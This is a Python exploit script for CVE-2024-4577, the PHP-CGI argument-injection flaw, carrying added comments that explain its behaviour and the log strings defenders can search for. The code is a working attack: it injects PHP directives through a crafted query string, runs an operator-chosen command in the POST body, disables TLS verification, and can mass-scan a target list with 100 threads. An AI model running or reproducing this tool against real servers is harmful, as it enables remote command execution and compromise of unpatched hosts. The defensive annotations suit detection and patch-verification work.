CVE-2024-4577.py
from colorama import Fore
from concurrent.futures import ThreadPoolExecutor
import requests
import argparse
import socket
# Author: c0d3ninja
# Youtube: gotr00t0day
# Instagram: gotr00t0day
# Silence urllib3's InsecureRequestWarning. The probe in vuln_check() is sent with
# verify=False, so server certificates are never validated; this call removes the
# only runtime hint of that.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

# Fixed browser-like User-Agent attached to every request this script sends.
# Because it never varies, it shows up unchanged in the access logs of probed hosts.
user_agent = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/70.0.3538.77 Safari/537.36"
)

# Command-line interface: one target (-t) or a file of targets (-f), plus the
# command string (-c) that is placed in the POST body.
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="target to scan")
parser.add_argument("-c", "--command", help="command to execute")
parser.add_argument("-f", "--file", help="domains.txt")

# Arguments are parsed at module level, so importing this file also parses sys.argv.
args = parser.parse_args()

# Request headers shared by every probe.
header = {"User-Agent": user_agent}
def vuln_check(domain_command: tuple) -> None:
    """Send one CVE-2024-4577 probe to a host and print whether the marker came back.

    Args:
        domain_command: ``(domain, command)`` pair. ``domain`` gets an ``https://``
            prefix unless that substring already occurs in it; ``command`` is
            placed verbatim at the start of the POST body.

    The request is a POST to ``/index.php`` whose query string is
    ``%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input`` and whose
    body ends with ``;echo gotr00t; die;``. The host is reported with ``[+]`` when
    the literal ``gotr00t`` appears in the response text, otherwise with ``[-]``.

    Defender view: the same three strings are what to search for in web-server
    and WAF logs (a query string starting with ``%ADd+``, the two directive names,
    and the ``gotr00t`` marker in request bodies). Hosts stop answering this probe
    once PHP is updated to a release that fixes CVE-2024-4577 or PHP is no longer
    served through the CGI binary.
    """
    domain, command = domain_command

    # Substring test, not a prefix test: anything lacking "https://" is prefixed,
    # including values that already start with "http://".
    if "https://" not in domain:
        domain = f"https://{domain}"

    probe_url = (
        f"{domain}/index.php"
        "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
    )
    probe_body = f"{command};echo gotr00t; die;"

    try:
        session = requests.Session()
        # verify=False: the TLS certificate of the probed host is not checked.
        response = session.post(
            probe_url,
            data=probe_body,
            headers=header,
            verify=False,
            timeout=10,
        )
    except (
        socket.gaierror,
        requests.exceptions.ConnectionError,
        requests.exceptions.ReadTimeout,
    ):
        # Unresolvable, unreachable or slow hosts are skipped without any output,
        # so "no line printed" does not mean "not vulnerable".
        return

    # NOTE(review): an application that merely reflects the POST body would also
    # satisfy this check; treat a [+] as a lead to confirm, not as proof.
    if "gotr00t" in response.text:
        print(f"{Fore.GREEN}[+]{Fore.WHITE}{domain}")
    else:
        print(f"{Fore.RED}[-] {Fore.WHITE}{domain}")
def scan_domains(file: str, command: str) -> None:
    """Run vuln_check() against every line of a target file using a thread pool.

    Args:
        file: Path to a text file with one host per line; each line is stripped
            of surrounding whitespace and otherwise used as-is.
        command: Command string handed to vuln_check() for every host.
    """
    with open(file, "r") as handle:
        targets = [line.strip() for line in handle]

    jobs = [(target, command) for target in targets]

    # Up to 100 probes run concurrently. The iterator returned by map() is never
    # consumed, so an exception raised inside vuln_check() that it does not catch
    # itself is dropped silently instead of surfacing here.
    with ThreadPoolExecutor(max_workers=100) as pool:
        pool.map(vuln_check, jobs)
if __name__ == "__main__":
    # NOTE(review): the nesting below is reconstructed from a listing whose
    # indentation was lost; the `else` is read as belonging to the --file branch's
    # command check. Confirm against the original file.

    # Single-host mode: runs only when both -t and -c are given. With -t alone
    # nothing is sent and nothing is printed.
    if args.target and args.command:
        vuln_check((args.target, args.command))

    # List mode: -f requires -c; otherwise the usage hint is printed.
    if args.file:
        if not args.command:
            print("Please provide a command to execute with the -c/--command option.")
        else:
            scan_domains(args.file, args.command)